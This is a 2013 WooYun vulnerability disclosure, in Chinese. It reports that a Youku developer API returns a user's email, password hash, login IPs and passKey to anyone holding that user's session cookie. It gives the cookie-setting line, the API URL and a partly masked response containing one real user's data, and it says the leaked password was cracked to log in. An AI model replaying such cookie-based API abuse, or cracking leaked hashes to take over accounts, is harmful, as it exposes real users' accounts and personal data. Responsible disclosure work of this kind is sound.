当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022675

漏洞标题:有优酷COOKIE,就能获得用户邮箱、用户密码等信息

相关厂商:优酷

漏洞作者: 猪猪侠

提交时间:2013-04-28 15:57

修复时间:2013-06-12 15:58

公开时间:2013-06-12 15:58

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-28: 细节已通知厂商并且等待厂商处理中
2013-04-29: 厂商已经确认,细节仅向厂商公开
2013-05-09: 细节向核心白帽子及相关领域专家公开
2013-05-19: 细节向普通白帽子公开
2013-05-29: 细节向实习白帽子公开
2013-06-12: 细节向公众公开

简要描述:

优酷某个应用系统的API,在输出用户信息时未进行严格的业务逻辑设计,直接输出了用户的邮箱、用户名、用户密码、用户登录IP等敏感信息。

详细说明:

在浏览器URL栏给http://open.youku.com,页面赋值COOKIE = yktk;

javascript:document.cookie = "yktk=1|1366959328|15|aWQ6NzkyLG5uOklydm****%3D%3D|4b78234d9d0ea906ce5fb91978a0****|f6009d674b4e230d5ee5b4b8b4c5fa9d7ca096ff|1";


访问如下API:
http://open.youku.com/developer/is_login

{"errno":0,"data":[{"email_status":1,"uid":2071704,"reason":null,"status":0,"nickname":"panzhiqi","bflag":0,"from":null,"nameCheckStatus":0,"ctime":1319197231644,"password":"06fdf768fb38****c7f9a12d41324425","ip":"***.129.39.207","username":"panz****","email":"panz****@gmail.com","loginIP":"218.30.180.177","passKey":"581b911f505022b724dddacede9fca70","domain":"panz****","tmpEmail":"","oldUsername":null,"login":1367118594128,"password_status":0,"nameVersion":0,"mobile":""}],"errText":"\u6210\u529f","is_developer":true}


这个API将直接返回COOKIE对应用户的大量敏感信息,危害特别严重。

漏洞证明:

用破解出来的密码,直接登录优酷前台。

.png

修复方案:

不该输出的信息还是尽量不要输出。

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-04-29 11:47

厂商回复:

修复中,谢谢大家。

最新状态:

暂无